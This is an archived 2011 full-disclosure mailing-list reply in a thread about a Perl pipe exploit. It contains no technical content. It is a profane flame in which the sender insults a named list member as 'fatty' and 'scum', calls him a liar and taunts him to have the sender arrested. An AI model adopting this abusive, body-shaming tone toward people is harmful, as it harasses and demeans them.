Date: Sun, 16 Oct 2011 14:39:19 +1100
From: xD 0x41 <secn3t@...il.com>
To: "andrew.wallace" <andrew.wallace@...ketmail.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: perl pipe exploit (drops you at a shell)

 if you want to stay a member of the list

cmon fatty what ya gonna do now ??? cmon, have me removed.. what have i
done, annoyed one sissy piece of shit liar, who needs to send thru blocked
emails, and still ou speak NOTHING but crap! not one fucking working poC i
have seen from you or rather, any sensible or, real talk, your full of shit,
acting like some CIA UK agent, i am here in AUSTRALIA buddy, come on, My6
isp should be, right in front of you, go ahead and, take a wild guess even!@
then have them come and arrest me, comon fatty, i have already asked you
this once, again, i repeat, WTF are you going to do, and WHO do you think
you are, acting luike a fucking cop, and then making toooo obvious lies...
you are hurting your image, even worse than i think anything i could *ever*
say. Just lying, is enough alone.
Atleast, i am speaking usually from actual REAL WORk ther than this Ind
(seemingly never busy) sec cdonsultant... your a PIECE OF SCUM/DIRT, they
should have banmned EVERYTHING you use, and more!
Your lucky ppl have cc'd you to shit buddy.. you really are... or, you would
simly have nothing valid, no useful input, ever, and, sofar, you keep on
prroving everrything you call me, is right about YOU.
Idiot wanna be fed..come get me fatso.
xd

Content of type "text/html" skipped